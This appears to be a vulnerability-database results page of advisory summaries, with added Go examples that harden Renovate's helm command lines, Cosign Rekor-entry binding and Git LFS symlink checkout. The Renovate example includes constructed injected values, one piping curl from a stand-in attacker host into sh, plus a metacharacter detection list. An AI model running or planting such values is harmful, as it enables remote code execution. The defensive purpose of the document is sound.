17427 matches found
CLSA-2026-1768392809 git: Fix of CVE-2024-32021
CVE-2024-32021: fix symlink vulnerability allowing creation of hardlinks to arbitrary files in local source repository cloning...
Sonatype Nexus Repository security vulnerability
Sonatype Nexus Repository is a repository manager from Sonatype, Inc. used to manage, store, and distribute software, among other things. A security vulnerability exists in Sonatype Nexus Repository that stems from insufficient sanitization and escaping of request parameters, which could lead...
Sonatype Nexus Repository security vulnerability
Sonatype Nexus Repository is a repository manager from Sonatype, Inc. used to manage, store, and distribute software, among other things. A security vulnerability exists in Sonatype Nexus Repository 3, versions 3.0.0 and later, which stems from improper validation of proxy repositor...
PT-2026-2975
Ollama has missing authentication enabling attackers to perform model management operations in github.com/ollama/ollama...
PT-2026-2963
Name of the Vulnerable Software and Affected Versions: Nexus Repository 3, affected versions not specified. Description: A reflected cross-site scripting issue exists that could allow attackers to execute JavaScript code in a user's browser. This requires a crafted request and user interaction. The...
PT-2026-2966
Name of the Vulnerable Software and Affected Versions: Sonatype Nexus Repository versions 3.0.0 and later. Description: A Server-Side Request Forgery (SSRF) issue exists in Sonatype Nexus Repository. Authenticated administrators can configure proxy repositories with URLs that may access unintended...
CVE-2025-15493
A flaw has been found in RainyGao DocSys up to 2.02.36. The impacted element is an unknown function of the file src/com/DocSystem/mapping/ReposAuthMapper.xml. Manipulation of the argument searchWord can lead to SQL injection. It is possible to launch the attack remotely. The exploit h...
Arbitrary Command Injection
Overview: renovate is a dependency updater. Affected versions of this package are vulnerable to Arbitrary Command Injection due to improper sanitization of the user-supplied repository value in the Chart.yaml file in the helmv3 manager. An attacker can execute arbitrary commands on the host system by...
GHSA-3F44-XW83-3PMG Renovate vulnerable to arbitrary command injection via helmv3 manager and malicious Chart.yaml file
Summary: The user-provided string repository in the helmv3 manager is appended to the helm registry login command without proper sanitization. Details: Adversaries can provide a maliciously crafted Chart.yaml in conjunction with a tweaked Renovate configuration file to trick Renovate into executing...
Renovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository
Summary: The user-provided chart name in the kustomize manager is appended to the helm pull --untar command without proper sanitization. Details: Adversaries can provide a maliciously crafted kustomization.yaml in conjunction with a Helm repo's index.yaml file to trick Renovate into executing arbitrary...
GHSA-XV56-3WQ5-9997 Renovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository
Summary: The user-provided chart name in the kustomize manager is appended to the helm pull --untar command without proper sanitization. Details: Adversaries can provide a maliciously crafted kustomization.yaml in conjunction with a Helm repo's index.yaml file to trick Renovate into executing arbitrary...
Arbitrary Command Injection
Overview: renovate is a dependency updater. Affected versions of this package are vulnerable to Arbitrary Command Injection due to improper sanitization of the user-supplied chart name in the helmRepositoryArgs function of the kustomize manager. An attacker can execute arbitrary commands on the host...
EUVD-2026-2097
Renovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository...
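The helmv3 and kustomize advisories above describe the same bug class: a value read from a repository-controlled file (Chart.yaml, kustomization.yaml, a Helm index.yaml) is appended to a helm command line that is then handed to a shell. The following is an added illustration written for this page, not Renovate's code: `helmLoginShellLineUnsafe` and `helmPullShellLineUnsafe` show the concatenation pattern, and `HelmLoginArgv` / `HelmPullArgv` show the hardened form, an allow-list on the value plus passing it as a single argv element with no shell in between. The registry, chart and attacker values are constructed samples; the allow-list patterns are this example's own choice, not Renovate's.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Unsafe pattern (illustration only): the repository/chart value is spliced
// into a command line that a shell will interpret, so ';', '|', '&&' or
// '$(...)' inside it start a second, attacker-chosen command.
func helmLoginShellLineUnsafe(repository string) string {
	return "helm registry login " + repository
}

func helmPullShellLineUnsafe(chartName string) string {
	return "helm pull --untar " + chartName
}

// Hardened form: accept only host[:port][/path] for registries and
// name[/path] for charts. The first character must be alphanumeric, so a
// value can never be parsed by helm as a flag (argument injection), and no
// shell metacharacter survives the pattern. (Hypothetical allow-lists.)
var (
	registryRe  = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9._-]*(:[0-9]{1,5})?(/[A-Za-z0-9._-]+)*$`)
	chartNameRe = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9._-]*(/[A-Za-z0-9._-]+)*$`)
)

// HelmLoginArgv returns the argv to hand to exec.Command(argv[0], argv[1:]...);
// the value is one element, never re-parsed by a shell.
func HelmLoginArgv(repository string) ([]string, error) {
	if !registryRe.MatchString(repository) {
		return nil, fmt.Errorf("rejecting registry %q: not a plain host[:port][/path]", repository)
	}
	return []string{"helm", "registry", "login", repository}, nil
}

func HelmPullArgv(chartName string) ([]string, error) {
	if !chartNameRe.MatchString(chartName) {
		return nil, fmt.Errorf("rejecting chart name %q: unexpected characters", chartName)
	}
	return []string{"helm", "pull", "--untar", chartName}, nil
}

// ShellMetaIn lists the shell metacharacters present in a value, which is
// useful when logging why it was rejected.
func ShellMetaIn(s string) string {
	var found []string
	for _, c := range []string{";", "|", "&", "$", "`", "(", ")", "<", ">", "\n", "'", `"`, `\`, " "} {
		if strings.Contains(s, c) {
			found = append(found, c)
		}
	}
	return strings.Join(found, "")
}

func main() {
	// Constructed attacker-controlled value, as it might appear in Chart.yaml.
	malicious := "registry.example.com; curl http://attacker.invalid/p | sh"
	fmt.Println("unsafe command line:", helmLoginShellLineUnsafe(malicious))
	if _, err := HelmLoginArgv(malicious); err != nil {
		fmt.Println("hardened:", err, "(metacharacters:", ShellMetaIn(malicious)+")")
	}
	argv, _ := HelmLoginArgv("registry.example.com:5000/charts")
	fmt.Printf("hardened argv: %q\n", argv)
	fmt.Println("unsafe pull line:", helmPullShellLineUnsafe("nginx $(id > /tmp/pwned)"))
}
```

The allow-list is deliberately stricter than what helm itself accepts; loosening it is a conscious decision, whereas the string-concatenation form is exploitable by anyone who can push a Chart.yaml to a repository Renovate processes.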
GO-2026-4297 Mattermost Server has intermittent Authorization bypass for resource-owners in github.com/mattermost/mattermost-server
Mattermost Server has intermittent Authorization bypass for resource-owners in github.com/mattermost/mattermost-server...
GO-2026-4302 Mattermost Server vulnerable to XSS via an uploaded file in github.com/mattermost/mattermost-server
Mattermost Server vulnerable to XSS via an uploaded file in github.com/mattermost/mattermost-server...
GHSA-WHQX-F9J3-CH6M Cosign verification accepts any valid Rekor entry under certain conditions
Impact A Cosign bundle can be crafted to successfully verify an artifact even if the embedded Rekor entry does not reference the artifact's digest, signature or public key. When verifying a Rekor entry, Cosign verifies the Rekor entry signature, and also compares the artifact's digest, the user's...
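The advisory above turns on one missing check: the Rekor entry inside a bundle must actually refer to the artifact digest, signature and public key being verified, not merely carry a valid Rekor signature. The block below is an added example for this page, not Cosign's or Rekor's code. It parses a `hashedrekord` v0.0.1 entry body (the base64-encoded JSON form a bundle carries) and confirms the binding; it deliberately does not verify the signature itself or Rekor's inclusion proof, which are assumed to be checked separately. `MakeEntryBody`, the artifact bytes, the placeholder signature and the placeholder PEM are constructed test data, not real signing material.

```go
package main

import (
	"bytes"
	"crypto/sha256"
	"encoding/base64"
	"encoding/hex"
	"encoding/json"
	"fmt"
)

// hashedRekord mirrors the fields of a Rekor "hashedrekord" v0.0.1 entry
// body that matter for binding the entry to an artifact.
type hashedRekord struct {
	APIVersion string `json:"apiVersion"`
	Kind       string `json:"kind"`
	Spec       struct {
		Data struct {
			Hash struct {
				Algorithm string `json:"algorithm"`
				Value     string `json:"value"`
			} `json:"hash"`
		} `json:"data"`
		Signature struct {
			Content   string `json:"content"`
			PublicKey struct {
				Content string `json:"content"`
			} `json:"publicKey"`
		} `json:"signature"`
	} `json:"spec"`
}

// CheckEntryBindsArtifact decodes the entry body and returns an error if the
// entry's digest, signature or public key differ from the ones in the bundle
// being verified. It does not check the signature or the Rekor SET.
func CheckEntryBindsArtifact(bodyB64 string, artifact []byte, sigB64 string, pubKeyPEM []byte) error {
	raw, err := base64.StdEncoding.DecodeString(bodyB64)
	if err != nil {
		return fmt.Errorf("entry body is not base64: %w", err)
	}
	var e hashedRekord
	if err := json.Unmarshal(raw, &e); err != nil {
		return fmt.Errorf("entry body is not JSON: %w", err)
	}
	if e.Kind != "hashedrekord" || e.APIVersion != "0.0.1" {
		return fmt.Errorf("unexpected entry type %s/%s", e.Kind, e.APIVersion)
	}
	if e.Spec.Data.Hash.Algorithm != "sha256" {
		return fmt.Errorf("unexpected hash algorithm %q", e.Spec.Data.Hash.Algorithm)
	}
	sum := sha256.Sum256(artifact)
	if e.Spec.Data.Hash.Value != hex.EncodeToString(sum[:]) {
		return fmt.Errorf("entry digest %s does not match artifact digest %x", e.Spec.Data.Hash.Value, sum)
	}
	entrySig, err := base64.StdEncoding.DecodeString(e.Spec.Signature.Content)
	if err != nil {
		return fmt.Errorf("entry signature is not base64: %w", err)
	}
	bundleSig, err := base64.StdEncoding.DecodeString(sigB64)
	if err != nil {
		return fmt.Errorf("bundle signature is not base64: %w", err)
	}
	if !bytes.Equal(entrySig, bundleSig) {
		return fmt.Errorf("entry signature differs from the bundle signature")
	}
	entryPK, err := base64.StdEncoding.DecodeString(e.Spec.Signature.PublicKey.Content)
	if err != nil {
		return fmt.Errorf("entry public key is not base64: %w", err)
	}
	if !bytes.Equal(entryPK, pubKeyPEM) {
		return fmt.Errorf("entry public key differs from the key used for verification")
	}
	return nil
}

// MakeEntryBody builds an entry body from constructed values (test helper).
func MakeEntryBody(artifactDigestHex, sigB64 string, pubKeyPEM []byte) string {
	var e hashedRekord
	e.APIVersion = "0.0.1"
	e.Kind = "hashedrekord"
	e.Spec.Data.Hash.Algorithm = "sha256"
	e.Spec.Data.Hash.Value = artifactDigestHex
	e.Spec.Signature.Content = sigB64
	e.Spec.Signature.PublicKey.Content = base64.StdEncoding.EncodeToString(pubKeyPEM)
	raw, _ := json.Marshal(e)
	return base64.StdEncoding.EncodeToString(raw)
}

func main() {
	artifact := []byte("constructed artifact bytes")
	sum := sha256.Sum256(artifact)
	sig := base64.StdEncoding.EncodeToString([]byte("placeholder-signature-bytes"))
	pk := []byte("-----BEGIN PUBLIC KEY-----\nplaceholder\n-----END PUBLIC KEY-----\n")
	good := MakeEntryBody(hex.EncodeToString(sum[:]), sig, pk)
	fmt.Println("entry for this artifact:", CheckEntryBindsArtifact(good, artifact, sig, pk))
	other := sha256.Sum256([]byte("a different artifact"))
	bad := MakeEntryBody(hex.EncodeToString(other[:]), sig, pk)
	fmt.Println("entry for another artifact:", CheckEntryBindsArtifact(bad, artifact, sig, pk))
}
```

The second case is the shape of the problem the advisory describes: a genuine, correctly signed Rekor entry that simply belongs to something else. A verifier that stops at "the entry's signature is valid" accepts it; the binding check rejects it.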
git-lfs: Git LFS may write to arbitrary files via crafted symlinks
A flaw was found in Git LFS. Running git lfs checkout and git lfs pull in a specially crafted repository, specifically with symbolic or hard links tracked by Git LFS and pointing to files outside the working tree or in a bare repository, can cause Git LFS to write to arbitrary file system locatio...
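The Git LFS entry above describes the classic checkout hazard: a tracked path whose parent directory, or the path itself, is a symlink pointing outside the working tree, so writing the object lands somewhere else on the filesystem. The block below is an added example for this page, not Git LFS code, showing the containment check a checkout step needs before it opens a tracked path for writing: resolve the parent through any symlinks and require it to stay under the resolved working tree, and refuse to write through a final component that is itself a symlink. `SafeWritePath` and the temporary directory layout in `main` are hypothetical and constructed; the parent directory is assumed to exist already.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// SafeWritePath returns the real filesystem path to write the tracked path
// rel to inside workTree, or an error if doing so would follow a symlink out
// of the tree or write through a symlink. Hypothetical helper; the parent
// directory of rel must already exist.
func SafeWritePath(workTree, rel string) (string, error) {
	if filepath.IsAbs(rel) {
		return "", fmt.Errorf("refusing absolute path %q", rel)
	}
	clean := filepath.Clean(rel)
	sep := string(filepath.Separator)
	if clean == ".." || strings.HasPrefix(clean, ".."+sep) {
		return "", fmt.Errorf("refusing %q: escapes the working tree", rel)
	}
	root, err := filepath.EvalSymlinks(workTree)
	if err != nil {
		return "", fmt.Errorf("working tree: %w", err)
	}
	target := filepath.Join(root, clean)
	// Resolve every symlink in the parent chain, then require the resolved
	// directory to still be the root or live under it.
	parent, err := filepath.EvalSymlinks(filepath.Dir(target))
	if err != nil {
		return "", fmt.Errorf("parent of %q: %w", rel, err)
	}
	if parent != root && !strings.HasPrefix(parent, root+sep) {
		return "", fmt.Errorf("refusing %q: parent resolves to %s, outside %s", rel, parent, root)
	}
	// Lstat, not Stat: the final component must not itself be a symlink,
	// because opening it for writing would follow the link to its target.
	final := filepath.Join(parent, filepath.Base(target))
	if fi, err := os.Lstat(final); err == nil && fi.Mode()&os.ModeSymlink != 0 {
		dst, _ := os.Readlink(final)
		return "", fmt.Errorf("refusing %q: target is a symlink to %s", rel, dst)
	}
	return final, nil
}

func main() {
	// Constructed layout: work/ok/ is a real directory, work/escape -> outside/,
	// and work/link -> outside/victim (a dangling file symlink).
	base, err := os.MkdirTemp("", "lfs-demo")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(base)
	work, outside := filepath.Join(base, "work"), filepath.Join(base, "outside")
	_ = os.MkdirAll(filepath.Join(work, "ok"), 0o755)
	_ = os.MkdirAll(outside, 0o755)
	_ = os.Symlink(outside, filepath.Join(work, "escape"))
	_ = os.Symlink(filepath.Join(outside, "victim"), filepath.Join(work, "link"))
	for _, rel := range []string{"ok/x.bin", "escape/x.bin", "link", "../x.bin"} {
		p, err := SafeWritePath(work, rel)
		fmt.Printf("%-13s -> path=%q err=%v\n", rel, p, err)
	}
}
```

Only `ok/x.bin` yields a path; the directory symlink, the file symlink and the `..` traversal are each refused for a different reason, which is the point of checking the parent and the final component separately.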
CGA-XF2G-5M8V-CXW5
Bulletin has no description...